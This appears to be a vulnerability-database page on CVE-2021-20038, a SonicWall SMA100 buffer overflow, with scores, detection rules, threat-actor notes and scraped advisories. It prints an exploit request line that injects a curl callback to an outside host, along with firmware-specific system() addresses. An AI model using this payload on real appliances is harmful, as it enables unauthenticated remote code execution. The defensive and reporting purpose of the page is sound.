CVE-2021-20038
published 2021-12-08CVE-2021-20038: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-02-11
Exploited in the wild
EPSS
99.91%
100.0th percentile
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonicwall | sma_200_firmware | — | — |
| sonicwall | sma_200_firmware | — | — |
| sonicwall | sma_200_firmware | — | — |
| sonicwall | sma_210_firmware | — | — |
| sonicwall | sma_210_firmware | — | — |
| sonicwall | sma_210_firmware | — | — |
| sonicwall | sma_400_firmware | — | — |
| sonicwall | sma_400_firmware | — | — |
| sonicwall | sma_400_firmware | — | — |
| sonicwall | sma_410_firmware | — | — |
| sonicwall | sma_410_firmware | — | — |
| sonicwall | sma_410_firmware | — | — |
| sonicwall | sma_500v_firmware | — | — |
| sonicwall | sma_500v_firmware | — | — |
| sonicwall | sma_500v_firmware | — | — |
| sonicwall | sonicwall_sma100 | — | — |
| sonicwall | sonicwall_sma100 | — | — |
| sonicwall | sonicwall_sma100 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandGET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat("A", 518)}} HTTP/1.1
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1"; flow:established,to_server; urilen:>400; threshold: type threshold, track by_src, count 10, seconds 30; http.request_line; content:"GET /%"; startswith; pcre:"/^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P(?:[%a-zA-Z0-9]{3}){4})(?P=addr)/R"; content:"%64%b8%06%08"; within:55; fast_pattern; content:"?"; reference:cve,2021-20038; classtype:attempted-admin; sid:2034984; rev:2; metadata:attack_target Server, created_at 2022_01_26, cve CVE_2021_20038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)bytes
%64%b8%06%08
bytes
%08%b7%06%08
bytes
%64%b8%06%08
bytes
%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf
- →The exploit payload encodes a stack address (%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf) followed by a system() address specific to the firmware version, then a shell command injection via brace expansion (curl), and a 518-byte 'A' padding — all within a single GET request URI.
- →Two distinct system() address values are used depending on firmware version: %08%b7%06%08 targets firmware 10.2.1.2-24sv, and %64%b8%06%08 targets firmware 10.2.1.1-17sv/19sv.
- →The vulnerability is in the SMA100 Apache httpd mod_cgi module environment variables; code executes as the 'nobody' user. Affected appliances: SMA 200, 210, 400, 410, 500v.
- →UNC6148 threat actor exploited CVE-2021-20038 (among other n-days) to steal administrator credentials before the targeted SMA appliance was updated to firmware 10.2.1.15-81sv. Credential theft artifact: persist.db database and certificate files.
- →OVERSTEP rootkit is deployed as a .ELF file decoded from base64 on SMA 100 series appliances; it establishes a reverse shell, steals passwords, and hides components using user-mode rootkit capabilities. Analysts should acquire disk images to detect it, as the rootkit interferes with live forensics.
- →OVERSTEP can steal sensitive files such as the persist.db database and certificate files, which give hackers access to credentials, OTP seeds, and certificates that allow persistence.
- →Threshold-based detection: trigger on 10 or more exploit attempts from the same source IP within 30 seconds to reduce false positives.
- ·The system() address offsets in the exploit payload are firmware-version-specific. %08%b7%06%08 applies only to 10.2.1.2-24sv and %64%b8%06%08 applies only to 10.2.1.1-17sv/19sv; detections relying solely on one address will miss exploitation attempts targeting the other firmware version.
- ·The Nuclei template uses a clusterbomb attack combining two prefix_addr and two system_addr payloads, requiring up to 2 HTTP requests (max-request: 2) to cover both firmware variants — detection infrastructure must account for multi-request exploit sequences.
- ·Incident responders could not confirm which specific vulnerability UNC6148 exploited for initial credential theft; CVE-2021-20038 is one of several candidates (also CVE-2024-38475, CVE-2021-20035, CVE-2021-20039, CVE-2025-32819).
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-jmhc-vxg9-h2g4: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attac
ghsa_unreviewed·2021-12-09
CVE-2021-20038 [CRITICAL] CWE-121 GHSA-jmhc-vxg9-h2g4: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attac
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
VulnCheck
SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-20038 [CRITICAL] CWE-121 SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
SonicWall SMA 100 devies are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
Affected: SonicWall SMA 100 Appliances
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.cisa.gov/uscert/ncas/alerts/aa23-040a; https://cisa.gov/news-events/alerts/2022/04/27/2021-top-routinely-exploited-vulnerabilities; https://cisa.gov/news-events/cybersecurity-advisories/aa22-117a; https://cisa.gov/news-events/cybersecurity-advisories/aa23-040a; https://4502402.fs1.hubspotusercontent-na1.net/hubfs/45
CISA
SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
cisa·2022-01-28·CVSS 9.8
CVE-2021-20038 [CRITICAL] CWE-121 SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
Vulnerability: SonicWall SMA 100 Appliances Stack-Based Buffer Overflow Vulnerability
Affected: SonicWall SMA 100 Appliances
SonicWall SMA 100 devies are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-20038
Remediation Due Date: 2022-02-11
Suricata
ET WEB_SERVER SonicWall SMA Unauthenticated sonicfiles Confused Deputy (CVE-2021-20042)
suricata·2025-04-14·CVSS 9.8
CVE-2021-20042 [CRITICAL] ET WEB_SERVER SonicWall SMA Unauthenticated sonicfiles Confused Deputy (CVE-2021-20042)
ET WEB_SERVER SonicWall SMA Unauthenticated sonicfiles Confused Deputy (CVE-2021-20042)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SERVER SonicWall SMA Unauthenticated sonicfiles Confused Deputy (CVE-2021-20042)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/fileshare/sonicfiles/sonicfiles|3f|"; fast_pattern; content:"RacNumber|3d|25"; content:"Arg1|3d|"; pcre:"/^[a-z]+\x3a\x2f{2}/R"; reference:url,www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/; reference:cve,2021-20042; classtype:web-application-attack; sid:2061554; rev:1; metadata:affected_product SonicWall, attack_target Server, tls_state TLSDecrypt, created_at 2025_04_14, cve CVE_2021_20042, deployment Perimeter, deployment Internal,
Suricata
ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1
suricata·2022-01-26·CVSS 9.8
CVE-2021-20038 [CRITICAL] ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1
ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M1"; flow:established,to_server; urilen:>400; threshold: type threshold, track by_src, count 10, seconds 30; http.request_line; content:"GET /%"; startswith; pcre:"/^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P(?:[%a-zA-Z0-9]{3}){4})(?P=addr)/R"; content:"%64%b8%06%08"; within:55; fast_pattern; content:"?"; reference:cve,2021-20038; classtype:attempted-admin; sid:2034984; rev:2; metadata:attack_target Server, created_at 2022_01_26, cve CVE_2021_20038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id
Suricata
ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M2
suricata·2022-01-26·CVSS 9.8
CVE-2021-20038 [CRITICAL] ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M2
ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M2
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT SonicWall SMA Stack-Based Buffer Overflow CVE-2021-20038 M2"; flow:established,to_server; urilen:>400; threshold: type threshold, track by_src, count 10, seconds 30; http.request_line; content:"GET /%"; startswith; pcre:"/^[a-zA-Z0-9]{2}[%a-zA-Z0-9]{9}(?P(?:[%a-zA-Z0-9]{3}){4})(?P=addr)/R"; content:"%08%b7%06%08"; within:55; fast_pattern; content:"?"; reference:cve,2021-20038; classtype:attempted-admin; sid:2034985; rev:2; metadata:attack_target Server, created_at 2022_01_26, cve CVE_2021_20038, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_03_08, mitre_tactic_id
Nuclei
SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-20038 [CRITICAL] SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
Template:
id: CVE-2021-20038
info:
name: SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution
author: dwisiswant0, jbaines-r7
severity: critical
description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user
Tenable
Exploitation of CVE-2025-40602 chained with CVE-2025-23006
blogs_tenable·2025-12-17·CVSS 9.8
[CRITICAL] Exploitation of CVE-2025-40602 chained with CVE-2025-23006
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
SonicWall urges admins to patch critical RCE flaw in SMA 100 devices
blogs_bleepingcomputer·2025-07-24·CVSS 6.5
CVE-2025-40599 [MEDIUM] SonicWall urges admins to patch critical RCE flaw in SMA 100 devices
## SonicWall urges admins to patch critical RCE flaw in SMA 100 devices
## Sergiu Gatlan
SonicWall urges customers to patch SMA 100 series appliances against a critical authenticated arbitrary file upload vulnerability that can let attackers gain remote code execution.
The security flaw (tracked as CVE-2025-40599) is caused by an unrestricted file upload weakness in the devices' web management interfaces, which can allow remote threat actors with administrative privileges to upload arbitrary files to the system.
"SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the specified fixed release version to remediate this vulnerability," the company said . "This vulnerability does not affect SonicWall SSL VPN SMA1000 series products or
Bleepingcomputer
SonicWall SMA devices hacked with OVERSTEP rootkit tied to ransomware
blogs_bleepingcomputer·2025-07-16·CVSS 6.5
[MEDIUM] SonicWall SMA devices hacked with OVERSTEP rootkit tied to ransomware
## SonicWall SMA devices hacked with OVERSTEP rootkit tied to ransomware
## Ionut Ilascu
A threat actor has been deploying a previously unseen malware called OVERSTEP that modifies the boot process of fully-patched but no longer supported SonicWall Secure Mobile Access appliances.
The backdoor is a user-mode rootkit that allows hackers to hide malicious components, maintain persistent access on the device, and steal sensitive credentials.
Researchers at Google Threat Intelligence Group (GTIG) observed the rootkit in attacks that may have relied on “an unknown, zero-day remote code execution vulnerability”.
The threat actor is tracked as UNC6148 and has been operating since at least last October, with an organization being targeted as recently as May.
Because files stolen from the vic
Tenable
CVE-2025-23006: SonicWall Secure Mobile Access (SMA) 1000 Zero-Day Reportedly Exploited
blogs_tenable·2025-01-23·CVSS 9.8
[CRITICAL] CVE-2025-23006: SonicWall Secure Mobile Access (SMA) 1000 Zero-Day Reportedly Exploited
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
South Korean and American Agencies Release Joint Advisory on North Korean Ransomware
blogs_tenable·2023-02-16
South Korean and American Agencies Release Joint Advisory on North Korean Ransomware
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Sentinelone
What Are Initial Access Brokers? - A Comprehensive Guide 101
blogs_sentinelone·2022-08-17
What Are Initial Access Brokers? - A Comprehensive Guide 101
From ransomware operators like LockBit and BlackBasta to APTs striking for or against Russian or Chinese interests, threat actors of various stripes all need one thing to get their operations off the ground: initial access to an organization’s network .
Such access can be bought on a variety of trading forums from cyber criminals who specialize in running low-risk phishing campaigns and credential theft operations, or in scanning enterprise networks for known remote code execution (RCE) software vulnerabilities.
Because of the ease with which initial access can now be obtained thanks to poor patch management and lax controls over identity and user credentials, there exists a market where supply is outstripping demand, and vendors involved in selling initial access are lowering their pric
Sentinelone
What Are Initial Access Brokers? - A Comprehensive Guide 101
blogs_sentinelone·2022-08-17
What Are Initial Access Brokers? - A Comprehensive Guide 101
From ransomware operators like LockBit and BlackBasta to APTs striking for or against Russian or Chinese interests, threat actors of various stripes all need one thing to get their operations off the ground: initial access to an organization’s network.
Such access can be bought on a variety of trading forums from cyber criminals who specialize in running low-risk phishing campaigns and credential theft operations, or in scanning enterprise networks for known remote code execution (RCE) software vulnerabilities.
Because of the ease with which initial access can now be obtained thanks to poor patch management and lax controls over identity and user credentials, there exists a market where supply is outstripping demand, and vendors involved in selling initial access are lowering their price
Checkpoint
31st January– Threat Intelligence Report
blogs_checkpoint·2022-01-31
CVE-2021-20038 31st January– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 31st January– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 31st January, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Hacktivist group from Belarus called “Belarusian Cyber Partisans” has breached the computers systems of Belarusian Railways. Threat actors claim to have encrypted the network and are extorting the Belarusian government, asking for the release of 50 political prisoners and a pledge from Belarussian Railways to halt transpor
Tenable
SonicWall Urges Users to Patch Several Vulnerabilities in Secure Mobile Access Products (CVE-2021-20038)
blogs_tenable·2021-12-08·CVSS 9.8
[CRITICAL] SonicWall Urges Users to Patch Several Vulnerabilities in Secure Mobile Access Products (CVE-2021-20038)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://github.com/jbaines-r7/badbloodhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/https://github.com/jbaines-r7/badbloodhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-20038
2021-12-08
Published
2022-01-28
Added to CISA KEV
Exploited in the wild